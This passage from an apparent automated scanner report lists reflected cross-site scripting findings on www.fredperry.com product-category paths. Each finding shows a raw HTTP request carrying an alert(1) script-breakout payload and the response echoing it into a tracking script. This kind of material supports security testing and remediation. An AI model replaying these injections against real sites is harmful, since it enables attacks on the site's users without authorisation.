Set-Cookie: frontend=u06s68bsfnbfrbev1v8hrviv00; expires=Tue, 09-Nov-2010 17:15:06 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29366

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition1b9eb"-alert(1)-"50f709e851f/women/trousers/");
//]]>
...[SNIP]...

1.199. http://www.fredperry.com/limited-edition/women/trousers/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/trousers/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b902"-alert(1)-"e78c997e91a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women1b902"-alert(1)-"e78c997e91a/trousers/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:15:34 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=1u5sk21vdignd9qge2jro4ab25; expires=Tue, 09-Nov-2010 17:15:34 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29366

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women1b902"-alert(1)-"e78c997e91a/trousers/");
//]]>
...[SNIP]...

1.200. http://www.fredperry.com/limited-edition/women/trousers/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/trousers/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3aa1"-alert(1)-"c696673324a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/trouserse3aa1"-alert(1)-"c696673324a/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:15:49 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=v2n0dgimikcflarir6k9fetlc1; expires=Tue, 09-Nov-2010 17:15:50 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29366

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/trouserse3aa1"-alert(1)-"c696673324a/");
//]]>
...[SNIP]...

1.201. http://www.fredperry.com/limited-edition/women/trousers/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/trousers/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 538dd"-alert(1)-"efb610e9ca5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/trousers/?538dd"-alert(1)-"efb610e9ca5=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:14:19 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=dehbjnf11amksjieq7m3vnflo6; expires=Tue, 09-Nov-2010 17:14:19 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 30910

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/trousers/?538dd"-alert(1)-"efb610e9ca5=1");
//]]>
...[SNIP]...

1.202. http://www.fredperry.com/limited-edition/women/woven-shirts/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/woven-shirts/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 319c8"-alert(1)-"f02ad1cb55f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition319c8"-alert(1)-"f02ad1cb55f/women/woven-shirts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:19:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=rigtgilqb83fphgid5aqj3mvp0; expires=Tue, 09-Nov-2010 17:19:43 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition319c8"-alert(1)-"f02ad1cb55f/women/woven-shirts/");
//]]>
...[SNIP]...

1.203. http://www.fredperry.com/limited-edition/women/woven-shirts/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/woven-shirts/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3421"-alert(1)-"f894b1a62ca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/womenc3421"-alert(1)-"f894b1a62ca/woven-shirts/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:20:07 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=j9893l7sb023k0sn5sgpfqtaf3; expires=Tue, 09-Nov-2010 17:20:07 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/womenc3421"-alert(1)-"f894b1a62ca/woven-shirts/");
//]]>
...[SNIP]...

1.204. http://www.fredperry.com/limited-edition/women/woven-shirts/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/woven-shirts/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48e5d"-alert(1)-"0ff88538cd5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/woven-shirts48e5d"-alert(1)-"0ff88538cd5/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:20:37 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=ci5qr6rsv2m15begkqb1alv0a0; expires=Tue, 09-Nov-2010 17:20:37 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29370

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/woven-shirts48e5d"-alert(1)-"0ff88538cd5/");
//]]>
...[SNIP]...

1.205. http://www.fredperry.com/limited-edition/women/woven-shirts/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /limited-edition/women/woven-shirts/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2c6f"-alert(1)-"871cf1c9b96 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /limited-edition/women/woven-shirts/?d2c6f"-alert(1)-"871cf1c9b96=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:18:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=571sncusi8ej2ov466ooejgm27; expires=Tue, 09-Nov-2010 17:18:00 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 35817

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Fred Pe
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/limited-edition/women/woven-shirts/?d2c6f"-alert(1)-"871cf1c9b96=1");
//]]>
...[SNIP]...

1.206. http://www.fredperry.com/men/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 19550"-alert(1)-"81e975f5d42 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /men19550"-alert(1)-"81e975f5d42/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 15:59:03 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=u66nlujlscjb3s1meug2h090a1; expires=Tue, 09-Nov-2010 16:59:03 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29339

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/men19550"-alert(1)-"81e975f5d42/");
//]]>
...[SNIP]...

1.207. http://www.fredperry.com/men/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15acc"-alert(1)-"28a03843a58 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /men/?15acc"-alert(1)-"28a03843a58=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 15:58:22 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=kts7ep6obi0558q58io3rba110; expires=Tue, 09-Nov-2010 16:58:22 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33692

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Men - F
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/men/?15acc"-alert(1)-"28a03843a58=1");
//]]>
...[SNIP]...

1.208. http://www.fredperry.com/men/jackets/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/jackets/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 610d1"-alert(1)-"57514bf41f7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /men610d1"-alert(1)-"57514bf41f7/jackets/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:02:02 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=4920voebp25nvsp534rnbf95g2; expires=Tue, 09-Nov-2010 17:02:02 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29347

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/men610d1"-alert(1)-"57514bf41f7/jackets/");
//]]>
...[SNIP]...

1.209. http://www.fredperry.com/men/jackets/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/jackets/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 53f66"-alert(1)-"a580dc5b08a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /men/jackets53f66"-alert(1)-"a580dc5b08a/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:02:17 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=s18c05vpirje707vgd46ji7t64; expires=Tue, 09-Nov-2010 17:02:18 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29347

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/men/jackets53f66"-alert(1)-"a580dc5b08a/");
//]]>
...[SNIP]...

1.210. http://www.fredperry.com/men/jackets/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/jackets/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dba1b"-alert(1)-"17a5fe70f88 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /men/jackets/?dba1b"-alert(1)-"17a5fe70f88=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:00:39 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=g1cqvnmjficp28jpl36upauge2; expires=Tue, 09-Nov-2010 17:00:39 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47179

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Men's J
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/men/jackets/?dba1b"-alert(1)-"17a5fe70f88=1");
//]]>
...[SNIP]...

1.211. http://www.fredperry.com/men/knitwear/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/knitwear/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a64af"-alert(1)-"3a1a3b3a61c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mena64af"-alert(1)-"3a1a3b3a61c/knitwear/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:01:30 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=u37p1ocep3e9f3icao3s3icac4; expires=Tue, 09-Nov-2010 17:01:31 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/mena64af"-alert(1)-"3a1a3b3a61c/knitwear/");
//]]>
...[SNIP]...

1.212. http://www.fredperry.com/men/knitwear/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /men/knitwear/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b4c2"-alert(1)-"ba5b05c538c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

